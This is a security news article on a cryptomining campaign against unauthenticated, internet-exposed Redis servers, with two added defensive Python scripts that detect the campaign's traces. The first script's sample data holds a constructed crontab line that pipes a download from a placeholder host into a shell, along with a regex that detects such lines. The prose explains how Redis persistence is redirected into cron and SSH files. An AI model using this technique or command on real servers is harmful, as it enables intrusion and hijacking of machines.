Threat actors targeted tens of thousands of unauthenticated Redis servers exposed across the internet as part of a cryptocurrency mining campaign.
Redis is a popular open-source data structure tool that can be used as a distributed in-memory database, message broker, or cache. The tool is not designed to be exposed on the internet, but researchers have discovered tens of thousands of Redis instances that are publicly accessible without authentication.
Researcher Victor Zhu described a Redis intrusion vulnerability that could be exploited to compromise Redis instances available online.
“Under certain conditions, when Redis is running with the root account (or not even), attackers can write an SSH public key file to the root account and log in to the victim server directly via SSH. This can allow hackers to gain server privileges, wipe or steal data, or even lead to encryption blackmail, critically compromising normal business services,” reads the post published by Zhu on September 11, 2022.
Now, researchers at Censys are warning of tens of thousands of unauthenticated Redis servers being exposed and attacked across the internet.
Threat actors target these instances to install a cryptocurrency miner.
“There are 39,405 unauthenticated Redis services out of a total of 350,675 Redis services on the public internet,” warns Censys. “Nearly 50% of unauthenticated Redis services on the web show signs of an attempted compromise.”
“The general idea behind this exploitation technique is to configure Redis to write its file-based database to a directory that contains some method of authorizing a user (like adding a key to ‘.ssh/authorized_keys’) or a process start (like adding a script to ‘/etc/cron.d’),” adds Censys.
The experts found evidence of the ongoing hacking campaign: threat actors attempted to save malicious crontab entries into the /var/spool/cron/root file using multiple Redis keys with the “backup” prefix (the Redis database dump is written to that path, so its contents are read as a crontab). The crontab entries allowed the attackers to run a shell script hosted on a remote server.
The shell script is designed to perform the following malicious actions:
- Stops and disables all running security-related processes
- Stops and disables all running system monitoring processes
- Removes and deletes all system and security-related log files, including shell histories (e.g. .bash_history).
- Adds a new SSH key to the root user’s authorized_keys file
- Disables the iptables firewall
- Installs multiple hacking and scanning tools like “masscan”
- Installs and runs the XMRig cryptocurrency mining application
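A defender checking a host for the persistence described above can look at the files this technique writes to. Two indicators follow directly from the report: a crontab or authorized_keys file that was produced by a Redis save begins with the RDB dump header rather than with text, and the dropped cron line pipes a downloaded script into a shell. The following checker is an added example (not Censys' tooling or the campaign's script); the path list, the function names and the sample bytes, including the placeholder URL, are constructed for illustration.

```python
"""Scan files the campaign writes (root crontab, authorized_keys) for two
indicators: the Redis RDB magic at the start of the file, meaning it was
written by a Redis SAVE rather than by cron or an editor, and a cron line
that pipes a curl/wget download straight into a shell.  Added example;
paths and sample data are constructed."""
import re

RDB_MAGIC = b"REDIS"   # every RDB dump starts with "REDIS" + a 4-digit version
# A cron command that fetches something with curl/wget and pipes it to sh/bash.
REMOTE_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b")
# Constructed list of the places this technique targets; adjust per distro.
DEFAULT_PATHS = ("/var/spool/cron/root", "/var/spool/cron/crontabs/root",
                 "/etc/cron.d/root", "/root/.ssh/authorized_keys")


def scan_dropfile(label, data):
    """Return a list of findings for the raw bytes of one file."""
    findings = []
    if data.startswith(RDB_MAGIC):
        findings.append("%s: starts with RDB magic, i.e. written by a Redis SAVE" % label)
    for line in data.decode("utf-8", errors="replace").splitlines():
        if REMOTE_SHELL_RE.search(line):
            findings.append("%s: pipes a download into a shell: %r" % (label, line.strip()[:80]))
    return findings


def scan_paths(paths=DEFAULT_PATHS):
    """Read each path that exists and collect findings; unreadable paths are skipped."""
    findings = []
    for p in paths:
        try:
            with open(p, "rb") as fh:
                findings.extend(scan_dropfile(p, fh.read()))
        except OSError:
            continue
    return findings


if __name__ == "__main__":
    # Constructed sample: an RDB header followed by the kind of crontab
    # entry the report describes (the URL is a placeholder).
    sample = (b"REDIS0009\xfa\tredis-ver\x056.0.16\n\n"
              b"*/2 * * * * curl -fsSL http://example.invalid/x.sh | sh\n\n")
    for f in scan_dropfile("/var/spool/cron/root", sample) + scan_paths():
        print("-", f)
```

The RDB check is the more reliable of the two: cron ignores the binary header lines and only executes the attacker's well-formed entry, so the file still works as a crontab, but no legitimate tool leaves that header in place. The regex is deliberately narrow (a download piped directly into a shell); a script fetched to disk and run in a second step will not match and needs a separate rule.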
The researchers used a recent list of unauthenticated Redis services running on TCP port 6379 to perform a one-time scan looking for the existence of the “backup1” key on each host. Censys found that of the 31,239 unauthenticated Redis servers in this list, 15,526 hosts had this key set. These instances were attacked by threat actors using the technique described above.
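The same one-time check can be run by an operator against their own instance, together with the configuration changes the technique relies on (the persistence directory and file name, and whether the instance is reachable without a password at all). The audit below is an added example, not the Censys scanner or any Redis project code; it speaks the Redis wire protocol (RESP) directly so that it needs only the Python standard library. The function names, the default host and port, and the sample configuration at the bottom are assumptions for illustration.

```python
"""Audit one Redis instance for the indicators in the Censys report: no
password, persistence redirected to a cron or SSH path, and keys with the
"backup" prefix.  Added example; talks RESP over a plain socket."""
import socket

# Paths an attacker points "dir"/"dbfilename" at so the RDB dump is parsed
# as a crontab or SSH key file (from the report).
SUSPICIOUS_DIRS = ("/var/spool/cron", "/etc/cron.d", "/.ssh")
SUSPICIOUS_FILENAMES = ("root", "authorized_keys")
OPEN_BINDS = ("0.0.0.0", "*", "::", "::*")
CONFIG_KEYS = ("dir", "dbfilename", "requirepass", "protected-mode", "bind")


class Incomplete(Exception):
    """Raised when the buffer does not yet hold a whole RESP reply."""


def encode_command(*parts):
    """Encode a command as a RESP array of bulk strings."""
    out = [b"*%d\r\n" % len(parts)]
    for p in parts:
        b = p.encode() if isinstance(p, str) else p
        out.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(out)


def parse_resp(buf, pos=0):
    """Parse one RESP value at buf[pos:]; return (value, next_pos)."""
    end = buf.find(b"\r\n", pos)
    if end < 0:
        raise Incomplete
    kind, line = buf[pos:pos + 1], buf[pos + 1:end]
    pos = end + 2
    if kind in (b"+", b"-"):            # simple string / error
        return line.decode(), pos
    if kind == b":":                    # integer
        return int(line), pos
    if kind == b"$":                    # bulk string
        n = int(line)
        if n == -1:
            return None, pos
        if len(buf) < pos + n + 2:
            raise Incomplete
        return buf[pos:pos + n].decode(errors="replace"), pos + n + 2
    if kind == b"*":                    # array
        n = int(line)
        if n == -1:
            return None, pos
        items = []
        for _ in range(n):
            item, pos = parse_resp(buf, pos)
            items.append(item)
        return items, pos
    raise ValueError("unknown RESP type %r" % kind)


def assess(config, keys):
    """Turn CONFIG GET answers and a key list into a list of findings."""
    findings = []
    if not config.get("requirepass"):
        findings.append("no password set (requirepass empty)")
    if config.get("protected-mode", "").lower() == "no":
        findings.append("protected-mode disabled")
    bind = config.get("bind", "")
    if bind == "" or any(t.lstrip("-") in OPEN_BINDS for t in bind.split()):
        findings.append("listening on all interfaces (bind=%r)" % bind)
    d = config.get("dir", "")
    if any(s in d for s in SUSPICIOUS_DIRS):
        findings.append("persistence dir redirected to %s" % d)
    fn = config.get("dbfilename", "")
    if fn in SUSPICIOUS_FILENAMES:
        findings.append("dbfilename set to %r" % fn)
    backup = sorted(k for k in keys if k.startswith("backup"))
    if backup:
        findings.append("%d key(s) with 'backup' prefix: %s" % (len(backup), backup))
    return findings


def audit_live(host="127.0.0.1", port=6379, timeout=3.0):
    """Query a running instance and return assess()'s findings."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        def call(*parts):
            s.sendall(encode_command(*parts))
            data = b""
            while True:
                chunk = s.recv(65536)
                if not chunk:
                    raise ConnectionError("connection closed")
                data += chunk
                try:
                    return parse_resp(data)[0]
                except Incomplete:
                    continue
        ping = call("PING")
        if isinstance(ping, str) and ping.startswith("NOAUTH"):
            return []            # password required: not an open instance
        config = {}
        for name in CONFIG_KEYS:
            reply = call("CONFIG", "GET", name)
            if isinstance(reply, list) and len(reply) == 2:
                config[reply[0]] = reply[1]
        keys = call("KEYS", "backup*")   # narrow pattern, as in the Censys scan
        return assess(config, keys if isinstance(keys, list) else [])


if __name__ == "__main__":
    # Constructed sample matching the configuration the campaign leaves behind.
    sample = {"dir": "/var/spool/cron", "dbfilename": "root", "requirepass": "",
              "protected-mode": "no", "bind": "0.0.0.0"}
    for f in assess(sample, ["backup1", "backup2", "backup3", "backup4"]):
        print("-", f)
```

Run as a script it evaluates the constructed sample; `audit_live()` performs the same checks against a real instance. An instance that answers `PING` with `NOAUTH` is reported clean for the purposes of this campaign, since the attack depends on reaching `CONFIG SET` without credentials. The `dir`/`dbfilename` checks catch the compromise even after the attacker's keys have expired or been deleted, because the redirected persistence path stays in the running configuration until it is reset.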
Most of the Redis servers exposed to the internet are located in China (15.29%), followed by Germany (14.11%) and Singapore (12.43%).
“However, that doesn’t mean there are over 15,000 compromised hosts. It is unlikely that each of these hosts will have the conditions required for this vulnerability to be successful. The main reason why many of these attempts fail is that the Redis service needs to be run as a user with the appropriate permissions to write to the /var/spool/cron directory (i.e. root),” closes the report. “However, this can be the case when Redis is running in a container (like Docker) where the process sees itself running as root and allows the attacker to write these files. But in this case only the container is affected, not the physical host.”
The report also includes a list of countermeasures for these attacks.